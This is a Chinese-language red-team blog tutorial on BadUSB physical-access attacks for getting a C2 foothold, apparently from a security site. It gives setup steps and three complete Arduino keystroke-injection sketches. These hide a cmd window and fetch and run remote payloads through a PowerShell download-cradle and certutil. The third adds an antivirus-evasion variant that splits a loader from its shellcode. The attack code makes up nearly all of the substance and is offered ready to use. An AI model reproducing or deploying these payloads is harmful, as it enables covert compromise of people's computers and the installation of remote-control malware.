EthanDoctor

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

Ethan医生4周前信息收集46

 红队APT-近源攻击-BadUSB-上线C2


#BADUSB准备工作:

1、购买badusb,购买链接:

https://detail.tmall.com/item.htm?id=606447967370

2、安装ArduinoIDE,等待加载等

https://www.arduino.cc/en/donate/

https://blog.csdn.net/ShuaibeiJia/article/details/135315829

3、设置中文及插入USB后选择开发板

 

#BADUSB上线C2教程:

1、Powershell无文件上线

#include<Keyboard.h>

 

void setup() {

Keyboard.begin();

delay(3000);//延时

Keyboard.press(KEY_LEFT_GUI);

delay(200);

Keyboard.print("r");

delay(200);

Keyboard.release(KEY_LEFT_GUI);

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1"); //使用最小化隐藏cmd窗口

delay(200);

//=========================Run==========================

Keyboard.println("cmd");

delay(500);

Keyboard.println("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.9:6666/XD'))");

delay(5000);

//======================================================

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.end();//结束键盘通讯

}

 

void loop()

{

}

 

2、Certutil下载上线

#include<Keyboard.h>

 

void setup() {

Keyboard.begin();

delay(3000);//延时

Keyboard.press(KEY_LEFT_GUI);

delay(200);

Keyboard.print("r");

delay(200);

Keyboard.release(KEY_LEFT_GUI);

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1"); //使用最小化隐藏cmd窗口

delay(200);

//=========================Run==========================

Keyboard.println("cmd");

delay(500);

Keyboard.println("certutil -urlcache -split -f http://192.168.1.4:85/1.exe c:\\temp\\1.EXE");

Keyboard.println("cd c:\\temp\\");

Keyboard.println("1.exe");

delay(500);

Keyboard.println("exit");

//======================================================

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.end();//结束键盘通讯

}

 

void loop()

{

}

 

3、免杀思路:

思路:针对命令绕过配合分离免杀

#include<Keyboard.h>

 

void setup() {

Keyboard.begin();

delay(3000);//延时

Keyboard.press(KEY_LEFT_GUI);

delay(200);

Keyboard.print("r");

delay(200);

Keyboard.release(KEY_LEFT_GUI);

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1"); //使用最小化隐藏cmd窗口

delay(200);

//=========================Run==========================

Keyboard.println("cmd");

delay(500);

Keyboard.println("certutil -urlcache -split -f http://192.168.1.4:85/cs.exe c:\\temp\\CS.EXE");

Keyboard.println("certutil -urlcache -split -f http://192.168.1.4:85/cs.bin c:\\temp\\CS.BIN");

Keyboard.println("cd c:\\temp\\");

Keyboard.println("cs.exe");

delay(5000);

//======================================================

Keyboard.press(KEY_CAPS_LOCK);

Keyboard.release(KEY_CAPS_LOCK);

Keyboard.end();//结束键盘通讯

}

 

void loop()

{

}

标签: 红队APT
返回列表

上一篇:红队APT-钓鱼投递篇&近源攻击&WIFI网络&AP节点创建&数据监控&WiFiPumpkin3项目

下一篇:红队APT-流量隐匿篇&C2工具&加密数据&证书指纹&算法路径&Profiles规则&数据包特征

相关文章

红队APT-流量隐匿篇&安全测试&反拉黑&隐藏源IP&隧道代理池&秒切IP访问&绕防护设备

➢ 红队APT-流量隐匿-C2证书&特征分析➢ 红队APT-溯源隐藏-C2通讯&中转节点➢ 红队APT-溯源隐藏-IP通讯&反制拉黑溯源安全态势日...

红队APT-流量隐匿篇&C2工具&反溯源&隐藏源IP&云函数&CDN节点&数据中转&反向代理

➢ 红队APT-流量隐匿-C2证书&特征分析➢ 红队APT-溯源隐藏-C2通讯&中转节点#CDN利用意义:1、用于隐藏上线服务器IP2、节点IP均为厂商上线利用过程...

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-SendCloud转发➢ 红队APT-邮件钓鱼-Gophish批量系统前置内容:钓鱼邮件是指黑客伪装成同...

红队APT-流量隐匿篇&C2工具&加密数据&证书指纹&算法路径&Profiles规则&数据包特征

➢ 红队APT-流量隐匿-C2证书&特征分析#红队APT-流量隐匿-C2证书&特征分析1、证书相关:#NC-未加密&加密后-流量抓包对比nc -lvvp 5566nc...

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&EwoMail配合Gophish转发&劫持网页

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&EwoMail配合Gophish转发&劫持网页

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-自建EwoMail➢ 红队APT-邮件钓鱼-Gophish批量域名:xdsec.icu服务器:Cento...

红队APT-钓鱼投递篇&近源攻击&WIFI网络&AP节点创建&数据监控&WiFiPumpkin3项目

➢ 红队APT-近源攻击-WIFI-AP创建和监控#近源攻击-WIFI类https://mp.weixin.qq.com/s/QGGkDQcohM2HsXu_vz6idwWiFi-Pumpk...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号